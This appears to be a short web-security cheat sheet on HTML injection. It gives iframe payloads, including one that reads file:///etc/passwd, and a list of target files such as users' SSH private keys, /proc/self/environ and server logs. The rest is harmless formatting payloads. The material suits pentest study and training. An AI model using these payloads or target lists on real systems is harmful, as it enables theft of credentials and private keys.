Post

HTML Injection

Posted Updated
Preview Image
By
1 min read
HTML Injection

HTML Injection

iframe

Embedding External Content: The src attribute specifies the file of the document to embed.

  1. Try to grab the id_rsa key home/<username>/.ssh/id_rsa
  2. Try to find the creds locations of the application.
  3. Important file locations:- /proc/self/cmdline /proc/self/environ /etc/apache2/sites-enabled/000-default.conf /etc/nginx/sites-enabled/default /var/log/apache2/access.log /var/log/auth.log
1

<iframe src="http://example.com" width="400" height="300" scrolling="yes"></iframe>

1

<iframe src="file:///etc/passwd" width="400" height="300" scrolling="yes"></iframe>

Simple Payloads:-

1
2
3
4
5
6
7
8
9
10
11
12

# Style
<style>h1 {color:red;}</style><h1>This is a heading</h1>

# Body
<body style="background-color:red">

# Bold, Underline, Mark, Acronym, Sectiom
<b>0xmr</b>
<u>0xmr</u>
<mark>0xmr</mark
<acronym title="0xmr">AI</acronym>
<section>0xmr</section>

Resources

Web Exploitation
HTML Injection
This post is licensed under CC BY 4.0 by the author.